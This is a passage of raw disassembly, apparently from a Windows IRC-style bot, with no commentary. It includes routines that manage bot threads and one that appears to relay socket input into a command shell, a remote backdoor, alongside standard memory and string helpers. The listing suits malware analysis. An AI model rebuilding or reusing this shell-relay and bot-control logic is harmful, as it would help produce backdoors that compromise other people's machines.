push eax
push offset dword_42F180
call sub_40A627
pop ecx
pop ecx
loc_414E04: ; CODE XREF: sub_414D57+9C�j
pop edi
pop esi
pop ebx
leave
retn
sub_414D57 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_414E09 proc near ; DATA XREF: sub_414A34+71�o
var_DC = byte ptr -0DCh
var_14 = byte ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = byte ptr -8
var_7 = byte ptr -7
var_6 = byte ptr -6
var_5 = byte ptr -5
var_4 = byte ptr -4
var_3 = byte ptr -3
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 0DCh
push ebx
push esi
xor ebx, ebx
push edi
mov edi, [ebp+arg_0]
xor esi, esi
mov [ebp+var_10], ebx
mov [ebp+var_C], ebx
loc_414E22: ; CODE XREF: sub_414E09+39�j
; sub_414E09+D7�j ...
push ebx
lea eax, [ebp+arg_0+3]
push 1
push eax
push dword ptr [edi+0Ch]
call ds:dword_436480 ; recv
test eax, eax
jle loc_414F27
cmp [ebp+var_10], ebx
jbe short loc_414E44
dec [ebp+var_10]
jmp short loc_414E22
; ---------------------------------------------------------------------------
loc_414E44: ; CODE XREF: sub_414E09+34�j
mov al, byte ptr [ebp+arg_0+3]
movsx ecx, al
cmp ecx, 0FFh
jz loc_414F07
cmp al, 8
mov [ebp+var_C], ebx
jz short loc_414EB4
cmp al, 7Fh
jz short loc_414EB4
cmp al, 3
jnz short loc_414E6F
push ebx
push ebx
call ds:dword_42216C ; GenerateConsoleCtrlEvent
jmp short loc_414EDB
; ---------------------------------------------------------------------------
loc_414E6F: ; CODE XREF: sub_414E09+5A�j
cmp al, 15h
jnz short loc_414E91
xor esi, esi
mov [ebp+var_8], 20h
mov [ebp+var_7], 58h
mov [ebp+var_6], 58h
mov [ebp+var_5], 58h
mov [ebp+var_4], 0Dh
mov [ebp+var_3], 0Ah
push 6
jmp short loc_414EC7
; ---------------------------------------------------------------------------
loc_414E91: ; CODE XREF: sub_414E09+68�j
mov [ebp+esi+var_DC], al
inc esi
push 1
cmp al, 0Dh
mov [ebp+var_8], al
pop ecx
jnz short loc_414EC8
mov [ebp+esi+var_DC], 0Ah
mov [ebp+var_7], 0Ah
inc esi
push 2
jmp short loc_414EC7
; ---------------------------------------------------------------------------
loc_414EB4: ; CODE XREF: sub_414E09+52�j
; sub_414E09+56�j
cmp esi, ebx
jbe short loc_414EDE
dec esi
mov [ebp+var_8], 8
mov [ebp+var_7], 20h
mov [ebp+var_6], 8
push 3
loc_414EC7: ; CODE XREF: sub_414E09+86�j
; sub_414E09+A9�j
pop ecx
loc_414EC8: ; CODE XREF: sub_414E09+98�j
push ebx
lea eax, [ebp+var_8]
push ecx
push eax
push dword ptr [edi+0Ch]
call ds:dword_4364B8 ; send
test eax, eax
jle short loc_414F27
loc_414EDB: ; CODE XREF: sub_414E09+64�j
mov al, byte ptr [ebp+arg_0+3]
loc_414EDE: ; CODE XREF: sub_414E09+AD�j
cmp al, 0Dh
jnz loc_414E22
lea eax, [ebp+var_14]
push ebx
push eax
lea eax, [ebp+var_DC]
push esi
push eax
push dword ptr [edi+4]
call ds:dword_4220B0 ; WriteFile
test eax, eax
jz short loc_414F27
xor esi, esi
jmp loc_414E22
; ---------------------------------------------------------------------------
loc_414F07: ; CODE XREF: sub_414E09+47�j
cmp [ebp+var_C], ebx
jnz short loc_414F18
mov [ebp+var_C], 1
jmp loc_414E22
; ---------------------------------------------------------------------------
loc_414F18: ; CODE XREF: sub_414E09+101�j
mov [ebp+var_10], 0Ah
mov [ebp+var_C], ebx
jmp loc_414E22
; ---------------------------------------------------------------------------
loc_414F27: ; CODE XREF: sub_414E09+2B�j
; sub_414E09+D0�j ...
pop edi
pop esi
pop ebx
leave
retn
sub_414E09 endp
; =============== S U B R O U T I N E =======================================
sub_414F2C proc near ; CODE XREF: sub_404716+227�p
; sub_405898+F0�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
push edi
xor edi, edi
mov eax, offset dword_43BCC0
loc_414F34: ; CODE XREF: sub_414F2C+18�j
cmp byte ptr [eax], 0
jz short loc_414F48
add eax, 234h
inc edi
cmp eax, offset dword_4C8CC0
jl short loc_414F34
jmp short loc_414F93
; ---------------------------------------------------------------------------
loc_414F48: ; CODE XREF: sub_414F2C+B�j
push esi
mov esi, edi
imul esi, 234h
push 1FFh
push [esp+0Ch+arg_0]
lea eax, dword_43BCC0[esi]
push eax
call sub_416D30
mov eax, [esp+14h+arg_4]
add esp, 0Ch
mov ds:dword_43BEC0[esi], eax
and ds:dword_43BEC4[esi], 0
mov eax, [esp+8+arg_8]
and ds:dword_43BEC8[esi], 0
mov ds:dword_43BECC[esi], eax
and ds:byte_43BED8[esi], 0
pop esi
loc_414F93: ; CODE XREF: sub_414F2C+1A�j
mov eax, edi
pop edi
retn
sub_414F2C endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_414F97 proc near ; DATA XREF: sub_40D2E0+5C01�o
var_98 = dword ptr -98h
var_94 = byte ptr -94h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 98h
mov eax, [ebp+arg_0]
push esi
push edi
push 26h
pop ecx
mov esi, eax
lea edi, [ebp+var_98]
rep movsd
push [ebp+var_10]
mov dword ptr [eax+94h], 1
lea eax, [ebp+var_94]
push [ebp+var_C]
push eax
push [ebp+var_98]
call sub_414FE9
push [ebp+var_14]
call sub_415248
add esp, 14h
push 0
call ds:dword_422044 ; ExitThread
pop edi
pop esi
sub_414F97 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_414FE9 proc near ; CODE XREF: sub_414F97+38�p
var_200 = byte ptr -200h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
sub esp, 200h
push esi
push edi
push 0
push [ebp+arg_8]
push offset aThreadList ; "-[Thread List]-"
push [ebp+arg_4]
push [ebp+arg_0]
call sub_40BAE7
add esp, 14h
xor edi, edi
mov esi, offset dword_43BCC0
loc_415013: ; CODE XREF: sub_414FE9+78�j
cmp byte ptr [esi], 0
jz short loc_415054
cmp [ebp+arg_C], 0
jnz short loc_415027
cmp dword ptr [esi+204h], 0
jnz short loc_415054
loc_415027: ; CODE XREF: sub_414FE9+33�j
push esi
push edi
lea eax, [ebp+var_200]
push offset aD_S ; "%d. %s"
push eax
call sub_415480
push 1
lea eax, [ebp+var_200]
push [ebp+arg_8]
push eax
push [ebp+arg_4]
push [ebp+arg_0]
call sub_40BAE7
add esp, 24h
loc_415054: ; CODE XREF: sub_414FE9+2D�j
; sub_414FE9+3C�j
add esi, 234h
inc edi
cmp esi, offset dword_4C8CC0
jl short loc_415013
pop edi
pop esi
leave
retn
sub_414FE9 endp
; =============== S U B R O U T I N E =======================================
sub_415067 proc near ; CODE XREF: sub_40D2E0+4DD9�p
; sub_4150F5+12�p ...
arg_0 = dword ptr 4
push ebx
push ebp
push esi
mov esi, [esp+0Ch+arg_0]
xor ebx, ebx
xor ebp, ebp
cmp esi, ebx
jle short loc_4150EF
cmp esi, 400h
jge short loc_4150EF
imul esi, 234h
push edi
push ebx
push ds:dword_43BED4[esi]
lea edi, dword_43BED4[esi]
call ds:dword_422150 ; TerminateThread
cmp [edi], ebx
jz short loc_41509F
push 1
pop ebp
loc_41509F: ; CODE XREF: sub_415067+33�j
mov [edi], ebx
lea edi, dword_43BEC8[esi]
mov ds:dword_43BEC0[esi], ebx
mov ds:dword_43BEC4[esi], ebx
mov eax, [edi]
cmp eax, ebx
jbe short loc_4150C0
push eax
call sub_413887
pop ecx
loc_4150C0: ; CODE XREF: sub_415067+50�j
mov [edi], ebx
lea edi, dword_43BECC[esi]
mov byte ptr ds:dword_43BCC0[esi], bl
mov ds:byte_43BED8[esi], bl
push dword ptr [edi]
call ds:dword_436500 ; closesocket
lea esi, dword_43BED0[esi]
mov [edi], ebx
push dword ptr [esi]
call ds:dword_436500 ; closesocket
mov [esi], ebx
pop edi
loc_4150EF: ; CODE XREF: sub_415067+D�j
; sub_415067+15�j
mov eax, ebp
pop esi
pop ebp
pop ebx
retn
sub_415067 endp
; =============== S U B R O U T I N E =======================================
sub_4150F5 proc near ; CODE XREF: sub_409288:loc_4092AC�p
; sub_40B9B9+18�p ...
push ebx
push esi
push edi
xor ebx, ebx
xor edi, edi
mov esi, offset dword_43BCC0
loc_415101: ; CODE XREF: sub_4150F5+2A�j
cmp byte ptr [esi], 0
jz short loc_415112
push edi
call sub_415067
test eax, eax
pop ecx
jz short loc_415112
inc ebx
loc_415112: ; CODE XREF: sub_4150F5+F�j
; sub_4150F5+1A�j
add esi, 234h
inc edi
cmp esi, offset dword_4C8CC0
jl short loc_415101
pop edi
mov eax, ebx
pop esi
pop ebx
retn
sub_4150F5 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_415127 proc near ; CODE XREF: sub_40D2E0+1E3D�p
; sub_40D2E0+1EAB�p ...
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ecx
push ebx
push esi
xor ebx, ebx
push edi
mov edi, [ebp+arg_4]
mov [ebp+var_4], ebx
mov esi, offset dword_43BEC4
loc_41513B: ; CODE XREF: sub_415127+43�j
mov eax, [esi-4]
cmp eax, [ebp+arg_0]
jnz short loc_41515D
test edi, edi
jle short loc_41514F
cmp [esi], edi
jz short loc_41514F
cmp ebx, edi
jnz short loc_41515D
loc_41514F: ; CODE XREF: sub_415127+1E�j
; sub_415127+22�j
push ebx
call sub_415067
test eax, eax
pop ecx
jz short loc_41515D
inc [ebp+var_4]
loc_41515D: ; CODE XREF: sub_415127+1A�j
; sub_415127+26�j ...
add esi, 234h
inc ebx
cmp esi, offset dword_4C8EC4
jl short loc_41513B
mov eax, [ebp+var_4]
pop edi
pop esi
pop ebx
leave
retn
sub_415127 endp
; =============== S U B R O U T I N E =======================================
sub_415174 proc near ; CODE XREF: sub_405821+B�p
; sub_405898+2D�p ...
arg_0 = dword ptr 4
xor eax, eax
mov ecx, offset dword_43BEC0
loc_41517B: ; CODE XREF: sub_415174+1C�j
mov edx, [ecx]
cmp edx, [esp+arg_0]
jnz short loc_415184
inc eax
loc_415184: ; CODE XREF: sub_415174+D�j
add ecx, 234h
cmp ecx, offset dword_4C8EC0
jl short loc_41517B
retn
sub_415174 endp
; =============== S U B R O U T I N E =======================================
sub_415193 proc near ; CODE XREF: sub_40D2E0+5698�p
arg_0 = dword ptr 4
xor eax, eax
push esi
xor edx, edx
mov ecx, offset dword_43BEC0
loc_41519D: ; CODE XREF: sub_415193+1F�j
mov esi, [ecx]
cmp esi, [esp+4+arg_0]
jz short loc_4151B6
add ecx, 234h
inc edx
cmp ecx, offset dword_4C8EC0
jl short loc_41519D
pop esi
retn
; ---------------------------------------------------------------------------
loc_4151B6: ; CODE XREF: sub_415193+10�j
mov eax, edx
pop esi
retn
sub_415193 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4151BA proc near ; CODE XREF: sub_40D2E0+1070�p
var_200 = byte ptr -200h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
arg_18 = dword ptr 20h
arg_1C = dword ptr 24h
push ebp
mov ebp, esp
sub esp, 200h
xor eax, eax
cmp [ebp+arg_1C], eax
jz short loc_4151D3
push [ebp+arg_1C]
call sub_4159EF
pop ecx
loc_4151D3: ; CODE XREF: sub_4151BA+E�j
push eax
push [ebp+arg_18]
call sub_415127
pop ecx
test eax, eax
pop ecx
jle short loc_4151FF
push eax
lea eax, [ebp+var_200]
push [ebp+arg_14]
push [ebp+arg_10]
push offset aSSStopped_DThr ; "%s: %s stopped. (%d thread(s) stopped.)"...
push eax
call sub_415480
add esp, 14h
jmp short loc_415219
; ---------------------------------------------------------------------------
loc_4151FF: ; CODE XREF: sub_4151BA+26�j
push [ebp+arg_14]
lea eax, [ebp+var_200]
push [ebp+arg_10]
push offset aSNoSThreadFoun ; "%s: No %s thread found."
push eax
call sub_415480
add esp, 10h
loc_415219: ; CODE XREF: sub_4151BA+43�j
cmp [ebp+arg_C], 0
jnz short loc_415239
push 0
lea eax, [ebp+var_200]
push [ebp+arg_8]
push eax
push [ebp+arg_4]
push [ebp+arg_0]
call sub_40BAE7
add esp, 14h
loc_415239: ; CODE XREF: sub_4151BA+63�j
lea eax, [ebp+var_200]
push eax
call sub_40A5B3
pop ecx
leave
retn
sub_4151BA endp
; =============== S U B R O U T I N E =======================================
sub_415248 proc near ; CODE XREF: sub_401000+A5�p
; sub_40144A+8D�p ...
arg_0 = dword ptr 4
mov eax, [esp+arg_0]
xor ecx, ecx
imul eax, 234h
mov ds:dword_43BED4[eax], ecx
mov ds:dword_43BEC0[eax], ecx
mov ds:dword_43BEC4[eax], ecx
mov ds:dword_43BEC8[eax], ecx
mov ds:dword_43BECC[eax], ecx
mov ds:dword_43BED0[eax], ecx
mov byte ptr ds:dword_43BCC0[eax], cl
mov ds:byte_43BED8[eax], cl
retn
sub_415248 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_415285 proc near ; CODE XREF: sub_40D2E0+6189�p
; sub_4153B3+6B�p ...
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push esi
mov esi, [ebp+arg_0]
push 1
pop eax
loc_41528F: ; CODE XREF: sub_415285+68�j
mov cl, [esi]
test cl, cl
jz short loc_4152EF
cmp eax, 1
jnz short loc_4152EF
mov edx, [ebp+arg_4]
mov dl, [edx]
test dl, dl
jz short loc_4152EF
cmp cl, 2Ah
jz short loc_4152D6
cmp cl, 3Fh
jz short loc_4152B9
cmp cl, 5Bh
jz short loc_4152BE
xor eax, eax
cmp cl, dl
setz al
loc_4152B9: ; CODE XREF: sub_415285+26�j
inc [ebp+arg_4]
jmp short loc_4152E9
; ---------------------------------------------------------------------------
loc_4152BE: ; CODE XREF: sub_415285+2B�j
lea eax, [ebp+arg_4]
inc esi
push eax
lea eax, [ebp+arg_0]
push eax
mov [ebp+arg_0], esi
call sub_41531B
mov esi, [ebp+arg_0]
pop ecx
pop ecx
jmp short loc_4152E9
; ---------------------------------------------------------------------------
loc_4152D6: ; CODE XREF: sub_415285+21�j
lea eax, [ebp+arg_4]
push eax
lea eax, [ebp+arg_0]
push eax
call sub_4153B3
mov esi, [ebp+arg_0]
pop ecx
pop ecx
dec esi
loc_4152E9: ; CODE XREF: sub_415285+37�j
; sub_415285+4F�j
inc esi
mov [ebp+arg_0], esi
jmp short loc_41528F
; ---------------------------------------------------------------------------
loc_4152EF: ; CODE XREF: sub_415285+E�j
; sub_415285+13�j ...
cmp byte ptr [esi], 2Ah
jnz short loc_4152FF
cmp eax, 1
jnz short loc_415316
inc esi
mov [ebp+arg_0], esi
jmp short loc_4152EF
; ---------------------------------------------------------------------------
loc_4152FF: ; CODE XREF: sub_415285+6D�j
cmp eax, 1
jnz short loc_415316
mov eax, [ebp+arg_4]
cmp byte ptr [eax], 0
jnz short loc_415316
cmp byte ptr [esi], 0
jnz short loc_415316
push 1
pop eax
jmp short loc_415318
; ---------------------------------------------------------------------------
loc_415316: ; CODE XREF: sub_415285+72�j
; sub_415285+7D�j ...
xor eax, eax
loc_415318: ; CODE XREF: sub_415285+8F�j
pop esi
pop ebp
retn
sub_415285 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41531B proc near ; CODE XREF: sub_415285+45�p
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ecx
push ecx
mov edx, [ebp+arg_0]
push edi
xor edi, edi
push 1
mov ecx, [edx]
and [ebp+var_8], edi
pop eax
cmp byte ptr [ecx], 21h
mov [ebp+var_4], eax
jnz short loc_41533C
inc ecx
mov [ebp+var_8], eax
mov [edx], ecx
loc_41533C: ; CODE XREF: sub_41531B+19�j
push ebx
push esi
loc_41533E: ; CODE XREF: sub_41531B+7B�j
mov ecx, [edx]
mov bl, [ecx]
cmp bl, 5Dh
jnz short loc_41534C
cmp [ebp+var_4], eax
jnz short loc_415398
loc_41534C: ; CODE XREF: sub_41531B+2A�j
test edi, edi
jnz short loc_41538D
cmp bl, 2Dh
jnz short loc_415381
mov al, [ecx+1]
lea esi, [ecx+1]
mov cl, [ecx-1]
cmp cl, al
jge short loc_415381
cmp al, 5Dh
jz short loc_415381
cmp [ebp+var_4], edi
jnz short loc_415381
mov ebx, [ebp+arg_4]
mov ebx, [ebx]
mov bl, [ebx]
cmp bl, cl
jl short loc_41538D
cmp bl, al
jg short loc_41538D
push 1
mov [edx], esi
pop edi
jmp short loc_41538D
; ---------------------------------------------------------------------------
loc_415381: ; CODE XREF: sub_41531B+38�j
; sub_41531B+45�j ...
mov eax, [ebp+arg_4]
mov eax, [eax]
cmp bl, [eax]
jnz short loc_41538D
push 1
pop edi
loc_41538D: ; CODE XREF: sub_41531B+33�j
; sub_41531B+59�j ...
inc dword ptr [edx]
and [ebp+var_4], 0
push 1
pop eax
jmp short loc_41533E
; ---------------------------------------------------------------------------
loc_415398: ; CODE XREF: sub_41531B+2F�j
cmp [ebp+var_8], eax
pop esi
pop ebx
jnz short loc_4153A5
mov ecx, eax
sub ecx, edi
mov edi, ecx
loc_4153A5: ; CODE XREF: sub_41531B+82�j
cmp edi, eax
jnz short loc_4153AE
mov eax, [ebp+arg_4]
inc dword ptr [eax]
loc_4153AE: ; CODE XREF: sub_41531B+8C�j
mov eax, edi
pop edi
leave
retn
sub_41531B endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4153B3 proc near ; CODE XREF: sub_415285+59�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ecx
push ebx
push esi
mov esi, [ebp+arg_0]
push edi
mov edi, [ebp+arg_4]
mov [ebp+var_4], 1
inc dword ptr [esi]
mov ecx, [esi]
mov eax, [edi]
xor ebx, ebx
loc_4153CF: ; CODE XREF: sub_4153B3+3A�j
cmp [eax], bl
jz short loc_4153EF
mov cl, [ecx]
cmp cl, 3Fh
jz short loc_4153E4
cmp cl, 2Ah
jnz short loc_4153EF
cmp cl, 3Fh
jnz short loc_4153E7
loc_4153E4: ; CODE XREF: sub_4153B3+25�j
inc eax
mov [edi], eax
loc_4153E7: ; CODE XREF: sub_4153B3+2F�j
inc dword ptr [esi]
mov ecx, [esi]
mov eax, [edi]
jmp short loc_4153CF
; ---------------------------------------------------------------------------
loc_4153EF: ; CODE XREF: sub_4153B3+1E�j
; sub_4153B3+2A�j ...
mov eax, [esi]
cmp byte ptr [eax], 2Ah
jnz short loc_4153FA
inc dword ptr [esi]
jmp short loc_4153EF
; ---------------------------------------------------------------------------
loc_4153FA: ; CODE XREF: sub_4153B3+41�j
mov eax, [edi]
mov cl, [eax]
cmp cl, bl
jnz short loc_41541B
mov edx, [esi]
cmp [edx], bl
jz short loc_41540C
xor eax, eax
jmp short loc_41547B
; ---------------------------------------------------------------------------
loc_41540C: ; CODE XREF: sub_4153B3+53�j
cmp cl, bl
jnz short loc_41541B
mov ecx, [esi]
cmp [ecx], bl
jnz short loc_41541B
push 1
pop eax
jmp short loc_41547B
; ---------------------------------------------------------------------------
loc_41541B: ; CODE XREF: sub_4153B3+4D�j
; sub_4153B3+5B�j ...
push eax
push dword ptr [esi]
call sub_415285
pop ecx
test eax, eax
pop ecx
jnz short loc_415465
loc_415429: ; CODE XREF: sub_4153B3+B0�j
inc dword ptr [edi]
mov eax, [edi]
loc_41542D: ; CODE XREF: sub_4153B3+90�j
mov ecx, [esi]
mov dl, [eax]
mov cl, [ecx]
cmp cl, dl
jz short loc_415445
cmp cl, 5Bh
jz short loc_415445
cmp dl, bl
jz short loc_415445
inc eax
mov [edi], eax
jmp short loc_41542D
; ---------------------------------------------------------------------------
loc_415445: ; CODE XREF: sub_4153B3+82�j
; sub_4153B3+87�j ...
mov eax, [edi]
cmp [eax], bl
jz short loc_41545C
push eax
push dword ptr [esi]
call sub_415285
neg eax
pop ecx
sbb eax, eax
pop ecx
inc eax
jmp short loc_415461
; ---------------------------------------------------------------------------
loc_41545C: ; CODE XREF: sub_4153B3+96�j
mov [ebp+var_4], ebx
xor eax, eax
loc_415461: ; CODE XREF: sub_4153B3+A7�j
cmp eax, ebx
jnz short loc_415429
loc_415465: ; CODE XREF: sub_4153B3+74�j
mov eax, [edi]
cmp [eax], bl
jnz short loc_415478
mov eax, [esi]
cmp [eax], bl
jnz short loc_415478
mov [ebp+var_4], 1
loc_415478: ; CODE XREF: sub_4153B3+B6�j
; sub_4153B3+BC�j
mov eax, [ebp+var_4]
loc_41547B: ; CODE XREF: sub_4153B3+57�j
; sub_4153B3+66�j
pop edi
pop esi
pop ebx
leave
retn
sub_4153B3 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_415480 proc near ; CODE XREF: sub_401000+64�p
; sub_4010B5+308�p ...
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = byte ptr 10h
push ebp
mov ebp, esp
sub esp, 20h
mov eax, [ebp+arg_0]
push esi
mov [ebp+var_18], eax
mov [ebp+var_20], eax
lea eax, [ebp+arg_8]
mov [ebp+var_14], 42h
push eax
lea eax, [ebp+var_20]
push [ebp+arg_4]
mov [ebp+var_1C], 7FFFFFFFh
push eax
call sub_417F58
add esp, 0Ch
dec [ebp+var_1C]
mov esi, eax
js short loc_4154C0
mov eax, [ebp+var_20]
and byte ptr [eax], 0
jmp short loc_4154CD
; ---------------------------------------------------------------------------
loc_4154C0: ; CODE XREF: sub_415480+36�j
lea eax, [ebp+var_20]
push eax
push 0
call sub_417E43
pop ecx
pop ecx
loc_4154CD: ; CODE XREF: sub_415480+3E�j
mov eax, esi
pop esi
leave
retn
sub_415480 endp
; =============== S U B R O U T I N E =======================================
sub_4154D2 proc near ; CODE XREF: sub_401000+2E�p
; sub_401D82+46�p ...
arg_0 = dword ptr 4
mov eax, [esp+arg_0]
mov ds:dword_42F310, eax
retn
sub_4154D2 endp
; =============== S U B R O U T I N E =======================================
sub_4154DC proc near ; CODE XREF: sub_4010B5+CB�p
; sub_4010B5+13F�p ...
mov eax, ds:dword_42F310
imul eax, 343FDh
add eax, 269EC3h
mov ds:dword_42F310, eax
sar eax, 10h
and eax, 7FFFh
retn
sub_4154DC endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_415500 proc near ; CODE XREF: sub_4010B5+281�p
; sub_40144A+180�p ...
arg_0 = dword ptr 4
arg_4 = byte ptr 8
arg_8 = dword ptr 0Ch
mov edx, [esp+arg_8]
mov ecx, [esp+arg_0]
test edx, edx
jz short loc_415553
xor eax, eax
mov al, [esp+arg_4]
push edi
mov edi, ecx
cmp edx, 4
jb short loc_415547
neg ecx
and ecx, 3
jz short loc_415529
sub edx, ecx
loc_415523: ; CODE XREF: sub_415500+27�j
mov [edi], al
inc edi
dec ecx
jnz short loc_415523
loc_415529: ; CODE XREF: sub_415500+1F�j
mov ecx, eax
shl eax, 8
add eax, ecx
mov ecx, eax
shl eax, 10h
add eax, ecx
mov ecx, edx
and edx, 3
shr ecx, 2
jz short loc_415547
rep stosd
test edx, edx
jz short loc_41554D
loc_415547: ; CODE XREF: sub_415500+18�j
; sub_415500+3F�j ...
mov [edi], al
inc edi
dec edx
jnz short loc_415547
loc_41554D: ; CODE XREF: sub_415500+45�j
mov eax, [esp+4+arg_0]
pop edi
retn
; ---------------------------------------------------------------------------
loc_415553: ; CODE XREF: sub_415500+A�j
mov eax, [esp+arg_0]
retn
sub_415500 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_415560 proc near ; CODE XREF: sub_4010B5+22D�p
; sub_4010B5+23E�p ...
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
push edi
push esi
mov esi, [ebp+arg_4]
mov ecx, [ebp+arg_8]
mov edi, [ebp+arg_0]
mov eax, ecx
mov edx, ecx
add eax, esi
cmp edi, esi
jbe short loc_415580
cmp edi, eax
jb loc_4156F8
loc_415580: ; CODE XREF: sub_415560+16�j
test edi, 3
jnz short loc_41559C
shr ecx, 2
and edx, 3
cmp ecx, 8
jb short loc_4155BC
rep movsd
jmp off_4156A8[edx*4]
; ---------------------------------------------------------------------------
loc_41559C: ; CODE XREF: sub_415560+26�j
mov eax, edi
mov edx, 3
sub ecx, 4
jb short loc_4155B4
and eax, 3
add ecx, eax
jmp dword ptr loc_4155BC+4[eax*4]
; ---------------------------------------------------------------------------
loc_4155B4: ; CODE XREF: sub_415560+46�j
jmp dword ptr loc_4156B8[ecx*4]
; ---------------------------------------------------------------------------
align 4
loc_4155BC: ; CODE XREF: sub_415560+31�j
; sub_415560+8E�j ...
jmp off_41563C[ecx*4]
; ---------------------------------------------------------------------------
align 4
dd offset loc_4155D0
dd offset loc_4155FC
dd offset loc_415620
; ---------------------------------------------------------------------------
loc_4155D0: ; DATA XREF: sub_415560+64�o
and edx, ecx
mov al, [esi]
mov [edi], al
mov al, [esi+1]
mov [edi+1], al
mov al, [esi+2]
shr ecx, 2
mov [edi+2], al
add esi, 3
add edi, 3
cmp ecx, 8
jb short loc_4155BC
rep movsd
jmp off_4156A8[edx*4]
; ---------------------------------------------------------------------------
align 4
loc_4155FC: ; DATA XREF: sub_415560+68�o
and edx, ecx
mov al, [esi]
mov [edi], al
mov al, [esi+1]
shr ecx, 2
mov [edi+1], al
add esi, 2
add edi, 2
cmp ecx, 8
jb short loc_4155BC
rep movsd
jmp off_4156A8[edx*4]
; ---------------------------------------------------------------------------
align 10h
loc_415620: ; DATA XREF: sub_415560+6C�o
and edx, ecx
mov al, [esi]
mov [edi], al
inc esi
shr ecx, 2
inc edi
cmp ecx, 8
jb short loc_4155BC
rep movsd
jmp off_4156A8[edx*4]
; ---------------------------------------------------------------------------
align 4
off_41563C dd offset loc_41569F ; DATA XREF: sub_415560:loc_4155BC�r
dd offset loc_41568C
dd offset loc_415684
dd offset loc_41567C
dd offset loc_415674
dd offset loc_41566C
dd offset loc_415664
dd offset loc_41565C
; ---------------------------------------------------------------------------
loc_41565C: ; CODE XREF: sub_415560:loc_4155BC�j
; DATA XREF: sub_415560+F8�o
mov eax, [esi+ecx*4-1Ch]
mov [edi+ecx*4-1Ch], eax
loc_415664: ; CODE XREF: sub_415560:loc_4155BC�j
; DATA XREF: sub_415560+F4�o
mov eax, [esi+ecx*4-18h]
mov [edi+ecx*4-18h], eax
loc_41566C: ; CODE XREF: sub_415560:loc_4155BC�j
; DATA XREF: sub_415560+F0�o
mov eax, [esi+ecx*4-14h]
mov [edi+ecx*4-14h], eax
loc_415674: ; CODE XREF: sub_415560:loc_4155BC�j
; DATA XREF: sub_415560+EC�o
mov eax, [esi+ecx*4-10h]
mov [edi+ecx*4-10h], eax
loc_41567C: ; CODE XREF: sub_415560:loc_4155BC�j
; DATA XREF: sub_415560+E8�o
mov eax, [esi+ecx*4-0Ch]
mov [edi+ecx*4-0Ch], eax
loc_415684: ; CODE XREF: sub_415560:loc_4155BC�j
; DATA XREF: sub_415560+E4�o
mov eax, [esi+ecx*4-8]
mov [edi+ecx*4-8], eax
loc_41568C: ; CODE XREF: sub_415560:loc_4155BC�j
; DATA XREF: sub_415560+E0�o
mov eax, [esi+ecx*4-4]
mov [edi+ecx*4-4], eax
lea eax, ds:0[ecx*4]
add esi, eax
add edi, eax
loc_41569F: ; CODE XREF: sub_415560:loc_4155BC�j
; DATA XREF: sub_415560:off_41563C�o
jmp off_4156A8[edx*4]
; ---------------------------------------------------------------------------
align 4
off_4156A8 dd offset loc_4156B8 ; DATA XREF: sub_415560+35�r
; sub_415560+92�r ...
dd offset loc_4156C0
dd offset loc_4156CC
dd offset loc_4156E0
; ---------------------------------------------------------------------------
loc_4156B8: ; CODE XREF: sub_415560+35�j
; sub_415560+92�j ...
mov eax, [ebp+arg_0]
pop esi
pop edi
leave
retn
; ---------------------------------------------------------------------------
align 10h
loc_4156C0: ; CODE XREF: sub_415560+35�j
; sub_415560+92�j ...
mov al, [esi]
mov [edi], al
mov eax, [ebp+arg_0]
pop esi
pop edi
leave
retn
; ---------------------------------------------------------------------------
align 4
loc_4156CC: ; CODE XREF: sub_415560+35�j
; sub_415560+92�j ...
mov al, [esi]
mov [edi], al
mov al, [esi+1]
mov [edi+1], al
mov eax, [ebp+arg_0]
pop esi
pop edi
leave
retn
; ---------------------------------------------------------------------------
align 10h
loc_4156E0: ; CODE XREF: sub_415560+35�j
; sub_415560+92�j ...
mov al, [esi]
mov [edi], al
mov al, [esi+1]
mov [edi+1], al
mov al, [esi+2]
mov [edi+2], al
mov eax, [ebp+arg_0]
pop esi
pop edi
leave
retn
; ---------------------------------------------------------------------------
align 4
loc_4156F8: ; CODE XREF: sub_415560+1A�j
lea esi, [ecx+esi-4]
lea edi, [ecx+edi-4]
test edi, 3
jnz short loc_41572C
shr ecx, 2
and edx, 3
cmp ecx, 8
jb short loc_415720
std
rep movsd
cld
jmp off_415840[edx*4]
; ---------------------------------------------------------------------------
align 10h
loc_415720: ; CODE XREF: sub_415560+1B1�j
; sub_415560+208�j ...
